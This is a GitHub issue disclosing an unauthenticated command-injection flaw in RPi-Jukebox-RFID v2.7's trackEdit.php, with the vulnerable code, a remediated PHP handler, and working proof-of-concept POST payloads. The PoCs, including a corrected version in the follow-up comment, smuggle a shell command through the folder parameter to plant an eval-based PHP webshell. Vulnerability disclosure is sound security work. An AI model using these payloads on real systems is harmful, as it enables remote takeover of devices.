
🐛 | RPi-Jukebox-RFID V2.7_RCE_5 #2400

Open
xjzzzxx opened this issue Jul 11, 2024 · 1 comment
Labels
bug legacy_v2 Issues, discussions and PRs related to Version 2.x needs triage

Comments

@xjzzzxx

xjzzzxx commented Jul 11, 2024

Version

v2.7.0

Branch

released

OS

ubuntu 22

Pi model

unknown

Hardware

No response

What happened?

Hello,

I would like to report an RCE vulnerability in RPi-Jukebox-RFID v2.7 (no permissions required).

Analysis

The path of the vulnerability: htdocs\trackEdit.php

if($_POST['ACTION'] == "trackDelete") {        // Line 232 (CheckPoint)
    if($_POST['deleteTrack'] == "yes") {       // Line 233 (CheckPoint)
        $exec = 'sudo rm "'.$post['folder'].'/'.$post['filename'].'"'; // Line 235 (Source)
        exec($exec);                           // Line 236 (Sink)
    }
}

The source is on Line 235 ($_POST['folder'] and $_POST['filename']).

Then there are two checkpoints (Line 232 and Line 233), which we bypass by setting $_POST['ACTION'] = trackDelete and $_POST['deleteTrack'] = yes.

After bypassing the two checkpoints, the tainted source is passed to $exec and exec($exec) (Line 236) without any further check.

Poc

POST /htdocs/trackEdit.php

Data:

ACTION=trackDelete&deleteTrack=yes&folder=hello%22+%3b+echo+%22%3c%3fphp+%40eval(%24_POST%5b%27pass%27%5d)+%3f%3e%22++%3e+.%2fshell5.php+%3b&filename=1%22

Here is the version without URL encoding, for ease of understanding:

ACTION=trackDelete&deleteTrack=yes&folder=hello" ; echo "<?php @eval($_POST['pass']) ?>" > ./shell5.php ;&filename=1"

Manual verification

[screenshots]

The attacker can then easily connect to this webshell (/htdocs/shell5.php).

Logs

No response

Configuration

No response

More info

No response

@xjzzzxx xjzzzxx added bug legacy_v2 Issues, discussions and PRs related to Version 2.x needs triage labels Jul 11, 2024
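The root cause reported above is that two request parameters are concatenated into a shell command string and handed to exec(). The following is an added example of a hardened replacement for the trackDelete branch; it is not code from the RPi-Jukebox-RFID project. It assumes the audio library lives under a fixed directory (AUDIO_ROOT, assumed path), that `folder` is relative to that directory, and that the web server user may delete files there, so no shell and no sudo are involved; function names are hypothetical.

```php
<?php
// Added example, not project code. Assumed location of the audio library.
const AUDIO_ROOT = '/home/pi/RPi-Jukebox-RFID/shared/audiofolders';

/**
 * Resolve a user-supplied folder/filename pair to an existing file inside
 * AUDIO_ROOT. Returns the canonical path, or null if anything is off.
 */
function resolveTrackPath(string $folder, string $filename): ?string
{
    // The file name must be a bare name: no separators, no traversal, no NUL.
    if ($filename === '' || $filename !== basename($filename)
        || strpos($filename, "\0") !== false) {
        return null;
    }
    // Canonicalise the folder and confirm it is still under AUDIO_ROOT.
    $root = realpath(AUDIO_ROOT);
    $dir  = realpath(AUDIO_ROOT . '/' . $folder);
    if ($root === false || $dir === false) {
        return null;
    }
    if ($dir !== $root && strpos($dir, $root . '/') !== 0) {
        return null;                     // escaped the library directory
    }
    $path = $dir . '/' . $filename;
    return is_file($path) ? $path : null;
}

/**
 * Hardened trackDelete handler. Call as deleteTrack($_POST).
 * Returns true only when a validated file was removed.
 */
function deleteTrack(array $post): bool
{
    if (($post['ACTION'] ?? '') !== 'trackDelete'
        || ($post['deleteTrack'] ?? '') !== 'yes') {
        return false;
    }
    $path = resolveTrackPath((string)($post['folder'] ?? ''),
                             (string)($post['filename'] ?? ''));
    if ($path === null) {
        // Log the rejected request so attempts are visible to operators.
        error_log('trackDelete rejected: ' . json_encode($post));
        return false;
    }
    // unlink() never touches a shell, so quotes, ';' and redirections in the
    // input are inert. If root privileges were truly required, the validated
    // $path would still have to go through escapeshellarg() before any exec().
    return unlink($path);
}
```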
@xjzzzxx
Author

xjzzzxx commented Jul 12, 2024

I'm sorry for the issue with the PoC I wrote earlier. I forgot to escape @, which resulted in the generated webshell being unusable. Here is the correct PoC:

Poc_fixed

POST /htdocs/trackEdit.php

Data

ACTION=trackDelete&deleteTrack=yes&folder=hello%22+%3b+echo+%22%3c%3fphp+%40eval(%5c%24_POST%5b%27shell5%27%5d)+%3f%3e%22++%3e+.%2fshell5.php+%3b&filename=1%22

Here is the data without URL encoding, for ease of understanding:

ACTION=trackDelete&deleteTrack=yes&folder=hello" ; echo "<?php @eval(\$_POST['shell5']) ?>" > ./shell5.php ;&filename=1"

Manual verification

[screenshots]
